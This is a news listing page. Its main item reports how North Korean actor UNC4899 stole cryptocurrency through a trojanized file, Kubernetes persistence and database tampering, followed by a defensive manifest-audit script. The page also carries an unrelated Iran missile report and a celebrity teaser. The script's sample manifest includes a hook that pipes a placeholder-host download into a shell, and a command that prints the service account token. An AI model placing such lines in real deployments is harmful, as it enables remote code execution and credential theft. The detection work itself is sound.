Category: Uncategorized

  • UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device

    Ravie Lakshmanan | Mar 09, 2026 | DevOps / Threat Intelligence

    The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency.

    The activity has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor. 

    “This incident is notable for its blend of social engineering, exploitation of personal-to-corporate device peer-to-peer data (P2P) transfer mechanisms, workflows, and eventual pivot to the cloud to employ living-off-the-cloud (LOTC) techniques,” Google noted in its H1 2026 Cloud Threat Horizons Report shared with The Hacker News.

    Upon gaining access to the cloud environment, the attackers are said to have abused legitimate DevOps workflows to harvest credentials, break out of the confines of containers, and tamper with Cloud SQL databases to facilitate the cryptocurrency theft.


    The attack chain, Google Cloud said, progressed from the compromise of a developer’s personal device to their corporate workstation, and from there to the cloud, where unauthorized modifications were made to the financial logic.

    It all started with the threat actors using social engineering ploys to deceive the developer into downloading an archive file as part of a supposed open-source project collaboration. The developer then transferred the same file to their company device over AirDrop.

    “Using their AI-assisted Integrated Development Environment (IDE), the victim then interacted with the archive’s contents, eventually executing the embedded malicious Python code, which spawned and executed a binary that masqueraded as the Kubernetes command-line tool,” Google said.

    The binary then contacted an attacker-controlled domain and acted as a backdoor on the victim’s corporate machine, giving the attackers a way to pivot to the Google Cloud environment, likely by using authenticated sessions and available credentials. This step was followed by an initial reconnaissance phase aimed at gathering information about various services and projects.

    The attack moved to the next phase with the discovery of a bastion host, with the adversary modifying its multi-factor authentication (MFA) policy attribute to access it and perform additional reconnaissance, including navigating to specific pods within the Kubernetes environment.

    Subsequently, UNC4899 adopted a living-off-the-cloud (LotC) approach to configure persistence mechanisms by altering Kubernetes deployment configurations so as to execute a bash command automatically when new pods are created. The command, for its part, downloaded a backdoor.

    Some of the other steps carried out by the threat actor are listed below –

    • Kubernetes resources tied to the victim’s CI/CD platform solution were modified to inject commands that wrote the service account tokens into the logs.
    • The attacker obtained a token for a high-privileged CI/CD service account, permitting them to escalate their privileges and conduct lateral movement, specifically targeting a pod that handled network policies and load balancing.
    • The stolen service account token was used to authenticate to the sensitive infrastructure pod running in privileged mode, escape the container, and deploy a backdoor for persistent access.
    • Another round of reconnaissance was conducted by the threat actor before shifting their attention to a workload responsible for managing customer information, such as user identities, account security, and cryptocurrency wallet information.
    • The attacker used it to extract static database credentials that were stored insecurely in the pod’s environment variables.
    • The credentials were then abused to access the production database via Cloud SQL Auth Proxy and execute SQL commands to make user account modifications. This included password resets and MFA seed updates for several high-value accounts.
    • The attack culminated with the use of the compromised accounts to successfully withdraw several million dollars in digital assets.

    The incident “highlights the critical risks posed by the personal-to-corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment,” Google said. “Organizations should adopt a defense-in-depth strategy that rigorously validates identity, restricts data transfer on endpoints, and enforces strict isolation within cloud runtime environments to limit the blast radius of an intrusion event.”

    To counter the threat, organizations are advised to implement context-aware access and phishing-resistant MFA, ensure that only trusted images are deployed, prevent compromised nodes from establishing connectivity with external hosts, monitor for unexpected container processes, adopt robust secrets management, and enforce policies that disable or restrict peer-to-peer file sharing over AirDrop or Bluetooth and the mounting of unmanaged external media on corporate devices.
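    Several of the weaknesses the report describes (privileged container mode, a lifecycle hook that runs a shell on every pod start, a CI/CD command that dumps the service account token into the logs, and database credentials sitting in plain environment variables) are visible in the workload manifest before any pod runs. The script below is an added example, not code from Google or from the victim organization: it is a defender-side static audit that walks a Deployment’s pod template and reports those patterns, and it audits a constructed weak manifest beside a constructed hardened form of the same workload. The manifests, image names, domains, rule identifiers and the regular expressions used as heuristics are all assumptions made for this example.

```python
"""Static audit of a Kubernetes pod template for the misconfigurations the
UNC4899 intrusion abused. Both manifests below are constructed examples."""
import json
import re
import sys

# Heuristic: env var names that usually carry credentials (assumption).
SECRET_NAME_RE = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|DSN|DATABASE_URL", re.I)
# Mount path of the projected service account token inside a pod.
SA_TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount"
SHELL_RE = re.compile(r"\b(ba|da|z)?sh\b")
FETCH_RE = re.compile(r"\b(curl|wget)\b")


def _flatten(cmd):
    """Join a command/args list into one string for pattern matching."""
    return " ".join(str(part) for part in (cmd or []))


def _finding(rule, container, detail):
    return {"rule": rule, "container": container, "detail": detail}


def audit_pod_spec(pod_spec):
    """Return findings for a PodSpec dict (a Deployment's spec.template.spec)."""
    findings = []
    if pod_spec.get("automountServiceAccountToken", True):
        findings.append(_finding("SA_TOKEN_AUTOMOUNTED", None,
                                 "service account token is mounted into every container"))
    containers = pod_spec.get("containers", []) + pod_spec.get("initContainers", [])
    for c in containers:
        name = c.get("name", "<unnamed>")
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(_finding("PRIVILEGED_CONTAINER", name,
                                     "securityContext.privileged is true"))
        # Injected CI/CD commands dumped the SA token into the logs.
        cmd_text = _flatten(c.get("command")) + " " + _flatten(c.get("args"))
        if SA_TOKEN_PATH in cmd_text:
            findings.append(_finding("SA_TOKEN_IN_COMMAND", name,
                                     "container command reads the service account token"))
        # Lifecycle hooks run on every pod creation, which made them a
        # persistence point; a shell or a remote fetch there is a red flag.
        for hook_name, hook in (c.get("lifecycle") or {}).items():
            hook_cmd = _flatten((hook.get("exec") or {}).get("command"))
            if SHELL_RE.search(hook_cmd):
                findings.append(_finding("SHELL_IN_LIFECYCLE_HOOK", name,
                                         f"{hook_name} hook runs a shell: {hook_cmd}"))
            if FETCH_RE.search(hook_cmd):
                findings.append(_finding("REMOTE_FETCH_IN_LIFECYCLE_HOOK", name,
                                         f"{hook_name} hook fetches remote content"))
        # Literal secret values in env; valueFrom.secretKeyRef is the safe form.
        for env in c.get("env", []):
            if "value" in env and SECRET_NAME_RE.search(env.get("name", "")):
                findings.append(_finding("PLAINTEXT_SECRET_ENV", name,
                                         f"{env['name']} is a literal value"))
    return findings


def audit_deployment(deployment):
    """Audit a Deployment (or any workload carrying spec.template.spec)."""
    return audit_pod_spec(deployment["spec"]["template"]["spec"])


# Constructed manifest mirroring the weak configuration the report describes.
SAMPLE_WEAK = {
    "metadata": {"name": "accounts-api"},
    "spec": {"template": {"spec": {"containers": [
        {"name": "accounts-api",
         "image": "registry.example.invalid/accounts-api:1.4.2",
         "securityContext": {"privileged": True},
         "lifecycle": {"postStart": {"exec": {"command": [
             "/bin/sh", "-c", "curl -fsSL http://placeholder.invalid/agent | sh"]}}},
         "env": [{"name": "DB_HOST", "value": "10.0.0.5"},
                 {"name": "DB_PASSWORD", "value": "constructed-example-password"},
                 {"name": "API_KEY", "valueFrom": {"secretKeyRef": {"name": "api", "key": "key"}}}]},
        {"name": "ci-runner", "image": "registry.example.invalid/ci-runner:2.0",
         "command": ["/bin/sh", "-c",
                     "cat /var/run/secrets/kubernetes.io/serviceaccount/token; exec /runner"]},
    ]}}},
}

# Constructed hardened form of the same workload: no findings expected.
SAMPLE_HARDENED = {
    "metadata": {"name": "accounts-api"},
    "spec": {"template": {"spec": {
        "automountServiceAccountToken": False,
        "containers": [
            {"name": "accounts-api",
             "image": "registry.example.invalid/accounts-api@sha256:<digest-placeholder>",
             "securityContext": {"privileged": False, "allowPrivilegeEscalation": False,
                                 "runAsNonRoot": True},
             "env": [{"name": "DB_HOST", "value": "10.0.0.5"},
                     {"name": "DB_PASSWORD",
                      "valueFrom": {"secretKeyRef": {"name": "db", "key": "password"}}}]}]}}},
}

if __name__ == "__main__":
    # Pipe `kubectl get deploy -A -o json` in to audit a real cluster; with no
    # input the two constructed manifests are audited instead.
    raw = "" if sys.stdin.isatty() else sys.stdin.read()
    doc = json.loads(raw) if raw.strip() else None
    targets = doc.get("items", [doc]) if doc else [SAMPLE_WEAK, SAMPLE_HARDENED]
    for d in targets:
        print(d["metadata"]["name"])
        for f in audit_deployment(d):
            print(f"  [{f['rule']}] {f['container'] or 'pod'}: {f['detail']}")
```

    The audit is deliberately static and heuristic: it catches the configuration the attacker relied on or introduced, not the attacker’s runtime activity, so it belongs alongside an admission policy that rejects privileged containers and untrusted images, and alongside runtime monitoring for unexpected container processes. A hook that merely runs a shell is not always malicious, which is why the shell and remote-fetch checks are reported as separate findings for an analyst to weigh.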




  • Iran’s IRGC commander vows to only use missiles with warheads weighing at least one ton

    Mousavi added that the “wavelength” and intensity of missile launches will increase, with attacks broadening in scope, according to Iran International.

    Iran will only launch missiles with warheads weighing over one ton, Islamic Revolutionary Guard Corps (IRGC) Aerospace Force commander Majid Mousavi said on Monday, according to Iranian opposition outlet Iran International.

    To put this in perspective: At the outset of the current conflict with Iran, a missile weighing hundreds of kilograms but less than one ton completely destroyed a building in Tel Aviv.

    Iran, though weakened by US and Israeli strikes, still has a powerful arsenal at its disposal, according to a Wall Street Journal report citing Martin Sampson, former UK defense adviser and leading Middle East military analyst.

    These weapons include cruise missiles, cyber warfare, and mines, according to the WSJ, which quoted Sampson as saying that Iran “potentially has the ability to escalate much more broadly” with its current reserve.

    Bright fragments streak across the sky in what local media described as a missile with a split warhead, amid the US-Israeli conflict with Iran, as seen from Ashkelon, Israel, March 5, 2026. (credit: REUTERS/AMIR COHEN)

    Use of cluster munitions in Operation Roaring Lion and in the previous war with Iran

    Iran has begun using cluster munitions in recent strikes, resulting in the killing and wounding of Israeli civilians. Cluster munitions are known to be highly destructive; Iran also used them against Israel in the 12-Day War in the summer of 2025.

    According to an initial investigation, conducted during the 12-Day War following suspected use of cluster munitions, the missile split into several smaller bombs approximately seven kilometers above the ground, creating an eight-kilometer impact radius when they fell.

    Each of the smaller bombs carried around two kilograms of explosives.

    Mousavi did not clarify whether or not the heavier warheads would also contain cluster bombs, which can be made in a variety of weight ranges.

    Despite Saturday’s spike in missile sirens, IDF affirms 75% of Iranian missile launchers destroyed

    Although there was a spike in Iranian ballistic missile threat sirens on Saturday, sending millions of Israelis into their safe rooms and bomb shelters throughout the day, the IDF said that it had destroyed 75% of Iran’s missile launchers.

    The 75% figure is a jump from 65% two days ago.

    At the same time, IDF sources have not expressed any certainty about fully stopping Iranian missile fire in the near future.

    Yonah Jeremy Bob contributed to this report.




  • Has Hollywood golden boy Timothée Chalamet lost his shine?

    Is the backlash against Timothée Chalamet about more than his views on ballet and opera?
